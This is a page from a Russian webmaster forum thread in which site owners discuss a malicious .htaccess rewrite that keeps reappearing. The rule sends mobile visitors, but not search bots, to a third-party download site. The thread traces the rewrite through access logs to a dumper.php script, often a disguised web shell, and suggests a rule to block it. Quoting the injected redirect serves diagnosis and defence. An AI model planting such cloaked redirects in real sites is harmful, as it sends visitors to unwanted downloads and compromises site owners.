Общая тема о борьбе с шеллами и вирусами на сайте

M
На сайте с 24.10.2011
Offline
173
#181
Wss:
кто в этом разбирается - тут нет намека кудой они пролезли?

тут нет. все намеки в логах

M
На сайте с 01.08.2010
Offline
59
#182

Такая проблема, в .htaccess на 3 сайта на хостинге, прописывается код подобный RewriteEngine on

> RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\

> 60|symbos|windows\ mobile|windows\

> ce|ppc|smartphone|blackberry|mtk|windows\

> phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]

> RewriteCond %{HTTP_USER_AGENT}

> !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget)

> [NC]

> RewriteRule (.*)

> http://m.extrasoftw ......... и т.д.

руками удалял, вскоре опять появился.. списался с хостингом,

вот что пишут

"

Мы провели анализ лог файлов доступа, ниже представлено информация касательно времени изменения файла .htaccess, и выполненому запросу в это время, во всех представленных случаях запрос был выполнен к dumper.php:"

/www/domain/.htaccess

Change: 2013-07-14 22:27:24.793379657 +0400

82.211.30.*** - - [14/Jul/2013:22:27:24 +0400] "POST /dumper.php HTTP/1.1" 200 1723 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"

и т.д.

вот что пишет хостер ещё

Например такими правилами:

<Files dumper.php>

Order Deny,Allow

Deny from all

Allow from 127.0.0.1

</Files>

Где вместо 127.0.0.1, можете указать Ваш IP, чтобы разрешить доступ к данному файлу.

насколько важна это штука - dumper.php ?

Может действительно заблокировать ее в .htaccess... вреда не будет, надеюсь..

M
На сайте с 24.10.2011
Offline
173
#183
maxll:
насколько важна это штука - dumper.php ?

это вопрос к себе должен быть, а не к залу. что за cms на сайте?

Y
На сайте с 07.10.2012
Offline
90
#184

Народ, в файле .htaccess в корне каждый день появляются строчки редиректа на сайты загрузки всякой фигни для андроид устройств. Надоело уже каждый день удалять! Стоит ДЛЕ 9.8 лицензия.

Y
На сайте с 07.10.2012
Offline
90
#185

И еще у меня VPS и на нем гдето 7 сайтов. уже на 3 появилась такая хрень.

deepslam
На сайте с 09.05.2006
Offline
204
#186

Попробуйте скрипт поиска вредоносных кодов - Scripto Guard (http://www.virusonsite.ru/)

Удаление вирусов на сайте (http://www.virusonsite.ru) | Scripto CMS - бесплатная система управления сайтом (http://www.scripto-cms.ru) |Профессиональный скрипт каталога ссылок , статей, фирм и объявлений! (http://www.scripto.ru) | Уникальный скрипт для публикации контента (http://publisher.scripto.ru)
Miko
На сайте с 15.02.2010
Offline
62
#187

Хотел бы поделиться нашим бесплатным инструментов для защиты сайтов "САНТИ"

хабиб
На сайте с 23.06.2010
Offline
135
#188

Может кто-то подсказать для чего все-таки используется файл dumper.php в Вордпресс?

Можно ли его просто удалить, без ущерба функциональности сайта?

хостинговый хостинг (http://www.ihc.ru/?ref=7589)
S2
На сайте с 19.09.2013
Offline
7
#189

Можете посмотреть на моем сайте с безопасностью все в порядке?

GR
На сайте с 25.09.2013
Offline
2
#190
хабиб:
Может кто-то подсказать для чего все-таки используется файл dumper.php в Вордпресс?
Можно ли его просто удалить, без ущерба функциональности сайта?

Это скрипт управления базой mysql. http://sypex.net/ - оф сайт скрипта. Удаляйте, под это имя часто прячут веб-шеллы

---------- Добавлено 25.09.2013 в 10:59 ----------

yakes:
Народ, в файле .htaccess в корне каждый день появляются строчки редиректа на сайты загрузки всякой фигни для андроид устройств. Надоело уже каждый день удалять! Стоит ДЛЕ 9.8 лицензия.

Изучайте Log файлы, защитите Вашу админ панель от брутфорса. попросите хостинг провайдера поставить права на Ваш файл .htaccess с запретом для Вас на запись.

---------- Добавлено 25.09.2013 в 11:00 ----------

strannik201325:
Можете посмотреть на моем сайте с безопасностью все в порядке?

Давайте домен

---------- Добавлено 25.09.2013 в 11:01 ----------

yakes:
И еще у меня VPS и на нем гдето 7 сайтов. уже на 3 появилась такая хрень.

Скорее на тех сайтах на которых есть какая либо посещаемость, да?

---------- Добавлено 25.09.2013 в 11:06 ----------

maxll:
Такая проблема, в .htaccess на 3 сайта на хостинге, прописывается код подобный RewriteEngine on
> RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\
> 60|symbos|windows\ mobile|windows\
> ce|ppc|smartphone|blackberry|mtk|windows\
> phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
> RewriteCond %{HTTP_USER_AGENT}
> !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget)
> [NC]
> RewriteRule (.*)
> http://m.extrasoftw ......... и т.д.
руками удалял, вскоре опять появился.. списался с хостингом,
вот что пишут
"
Мы провели анализ лог файлов доступа, ниже представлено информация касательно времени изменения файла .htaccess, и выполненому запросу в это время, во всех представленных случаях запрос был выполнен к dumper.php:"

/www/domain/.htaccess
Change: 2013-07-14 22:27:24.793379657 +0400

82.211.30.*** - - [14/Jul/2013:22:27:24 +0400] "POST /dumper.php HTTP/1.1" 200 1723 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"

и т.д.

вот что пишет хостер ещё

Например такими правилами:

<Files dumper.php>
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
</Files>

Где вместо 127.0.0.1, можете указать Ваш IP, чтобы разрешить доступ к данному файлу.

насколько важна это штука - dumper.php ?
Может действительно заблокировать ее в .htaccess... вреда не будет, надеюсь..

Скиньте содержимое файла dumrep.php на pastebin.com и сюда ссылочку

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий